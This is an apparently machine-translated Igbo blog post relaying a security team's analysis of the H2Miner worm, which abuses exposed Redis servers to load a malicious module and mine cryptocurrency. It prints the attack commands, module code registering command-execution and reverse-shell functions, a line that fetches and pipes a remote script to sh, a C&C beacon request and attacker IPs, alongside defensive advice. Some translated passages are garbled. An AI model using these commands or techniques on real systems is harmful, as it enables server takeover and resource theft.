Otu ụbọchị gara aga, otu n'ime ihe nkesa nke ọrụ m nwere ụdị irighiri ahụ wakporo. N'ịchọ azịza nye ajụjụ ahụ "gịnị bụ ihe ahụ?" Achọtara m nnukwu akụkọ sitere na ndị otu Alibaba Cloud Security. Ebe ọ bụ na ahụghị m akụkọ a na Habré, ekpebiri m ịsụgharị ya karịsịa maka gị <3
entry
N'oge na-adịbeghị anya, ndị otu nchekwa Alibaba Cloud chọpụtara na mberede nke H2Miner. Ụdị worm ọjọọ a na-eji enweghị ikike ma ọ bụ okwuntughe na-adịghị ike maka Redis dị ka ọnụ ụzọ nke sistemu gị, mgbe nke ahụ gasịrị, ọ na-emekọrịta modul ọjọọ nke ya na ohu ahụ site na mmekọrịta nna ukwu-ohu ma mesịa budata modul ọjọọ a na igwe wakporo wee mee ihe ọjọọ. ntuziaka.
N'oge gara aga, a na-ebute mwakpo na sistemụ gị site na iji usoro metụtara ọrụ ahaziri ma ọ bụ igodo SSH nke edere na igwe gị mgbe onye mwakpo batara na Redis. Ọ dabara nke ọma, enweghị ike iji usoro a ọtụtụ oge n'ihi okwu njikwa ikike ma ọ bụ n'ihi ụdị sistemụ dị iche iche. Agbanyeghị, usoro a nke ịkwanye modul ọjọọ nwere ike mebie iwu onye mwakpo ahụ ozugbo ma ọ bụ nweta ohere na shei, nke dị ize ndụ maka sistemụ gị.
N'ihi ọnụ ọgụgụ dị ukwuu nke sava Redis na-akwado na ịntanetị (ihe fọrọ nke nta ka ọ bụrụ nde 1), ndị otu nchekwa Alibaba Cloud, dị ka ihe ncheta enyi na enyi, na-atụ aro ka ndị ọrụ ghara ịkekọrịta Redis n'ịntanetị ma na-enyocha ike nke okwuntughe ha mgbe niile yana ma ha na-emebi. ngwa ngwa nhọrọ.
H2Miner
H2Miner bụ botnet nke na-egwupụta akụ maka sistemụ Linux nke nwere ike ịwakpo sistemụ gị n'ụzọ dị iche iche, gụnyere enweghị ikike na Hadoop yarn, Docker, na adịghị ike Redis remote Command (RCE). A botnet na-arụ ọrụ site na nbudata scripts obi ọjọọ na malware ka m data gị, gbasaa ọgụ ahụ n'ihu, ma nọgide na-enwe iwu na njikwa (C&C) nkwukọrịta.
Mgbanwe nke RCE
Pavel Toporkov na-ekerịta ihe ọmụma banyere isiokwu a na ZeroNights 2018. Mgbe mbipute 4.0 gasịrị, Redis na-akwado ihe nkwụnye nkwụnye nkwụnye nke na-enye ndị ọrụ ikike ibu ibu ka faịlụ chịkọtara na C n'ime Redis iji mezuo iwu Redis kpọmkwem. Ọrụ a, ọ bụ ezie na ọ bara uru, nwere adịghị ike nke, na ọnọdụ nna ukwu-ohu, faịlụ nwere ike imekọrịta na ohu site na ọnọdụ zuru ezu. Nke a nwere ike iji onye na-awakpo nyefee faịlụ ọjọọ. Mgbe emechara mbufe ahụ, ndị na-awakpo ahụ na-ebunye modul ahụ na ihe atụ Redis wakporo wee mee iwu ọ bụla.
Nyocha nke worm malware
N'oge na-adịbeghị anya, ndị ọrụ nchekwa Alibaba Cloud achọpụtala na nha nke ndị na-egwuputa ihe ọjọọ H2Miner abawanyela na mberede. Dịka nyocha ahụ si kwuo, usoro izugbe nke mwakpo mwakpo bụ nke a:
H2Miner na-eji RCE Redis maka mwakpo zuru oke. Ndị mwakpo na-ebu ụzọ ebuso sava Redis ma ọ bụ nkesa na-enweghị nchekwa okwuntughe na-adịghị ike.
Ha na-eji iwu ahụ eme ihe config set dbfilename red2.so ka ịgbanwee aha faịlụ. Mgbe nke a gasịrị, ndị mwakpo ahụ na-eme iwu ahụ slaveof iji tọọ adreesị nnabata nna ukwu-ohu.
Mgbe ihe atụ Redis wakporo mebere njikọ nna ukwu na ohu na Redis obi ọjọọ nke onye mwakpo ahụ nwere, onye mwakpo ahụ na-eziga modul nje ahụ site na iji iwu resync zuru ezu iji mekọrịta faịlụ ndị ahụ. A ga-ebudata faịlụ red2.so na igwe wakporo. Ndị mwakpo ahụ na-eji modul loading ./red2.so buo faịlụ a. Modul ahụ nwere ike mebe iwu n'aka onye na-awakpo ma ọ bụ malite njikọ azụ (n'azụ ụlọ) iji nweta ohere na igwe wakporo.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Mgbe emechara iwu ọjọọ dịka / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, onye na-awakpo ahụ ga-emegharị aha faịlụ ndabere wee budata modul sistemu iji hichaa akara ndị ahụ. Agbanyeghị, faịlụ red2.so ka ga-adị n'igwe a wakporo. A dụrụ ndị ọrụ ọdụ ka ha ṅaa ntị na ọnụnọ nke faịlụ a na-enyo enyo na nchekwa nke ihe atụ Redis ha.
Na mgbakwunye na igbu ụfọdụ usoro ọjọọ iji zuo ihe onwunwe, onye mwakpo ahụ gbasoro edemede ọjọọ site na nbudata na igbu faịlụ ọnụọgụ abụọ. . Nke a pụtara na aha usoro ma ọ bụ aha ndekọ aha nwere kinsing na onye ọbịa nwere ike igosi na nje a butere igwe ahụ.
Dabere na nsonaazụ injinia azụ, malware na-arụ ọrụ ndị a:
- Na-ebugote faịlụ ma na-eme ha
- Ngwuputa
- Idokwa nzikọrịta ozi C&C na ime iwu mwakpo
Jiri masscan maka nyocha mpụga iji gbasaa mmetụta gị. Tụkwasị na nke ahụ, adreesị IP nke ihe nkesa C & C bụ ihe siri ike na mmemme ahụ, onye ọbịa ahụ wakporo ga-ekwurịta okwu na ihe nkesa nkwurịta okwu C & C site na iji arịrịọ HTTP, ebe a na-achọpụta ozi zombie (ihe nkesa mebiri emebi) na isi HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Ụzọ ọgụ ndị ọzọ
Adreesị na njikọ nke worm na-eji
/nkenke
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Ntughari
Nke mbụ, Redis ekwesịghị ịnweta ya na ịntanetị ma ekwesịrị iji paswọọdụ siri ike chebe ya. Ọ dịkwa mkpa ka ndị ahịa nyochaa na ọ dịghị faịlụ red2.so na ndekọ ndekọ Redis na ọ dịghị "kinsing" na faịlụ / aha usoro na onye ọbịa.
isi: www.habr.com